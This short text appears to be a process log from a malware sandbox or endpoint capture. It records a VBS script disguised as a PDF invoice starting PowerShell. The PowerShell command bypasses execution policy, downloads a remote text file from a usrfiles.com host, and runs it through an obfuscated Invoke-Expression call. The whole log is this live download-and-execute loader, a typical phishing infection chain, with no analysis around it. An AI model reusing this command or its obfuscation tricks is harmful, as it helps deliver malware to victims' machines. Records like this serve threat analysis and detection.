wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Invoice-1736478793~pdf.vbs
3044powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep byps $king = 'Iwr'; $LUNDDDd = 'cff66d08-d3f8-42db-911c-ce670399a441.usrfiles.com//////////////////////////////ugd//////////////////////////cff66d_d5db8a8b5ef84b21ac9ac6ba02b97571.txt'; &$king -Uri $LUNDDDd | .('{1}{0}'-f'phudddi','i').replace('phudddi','eX')
2208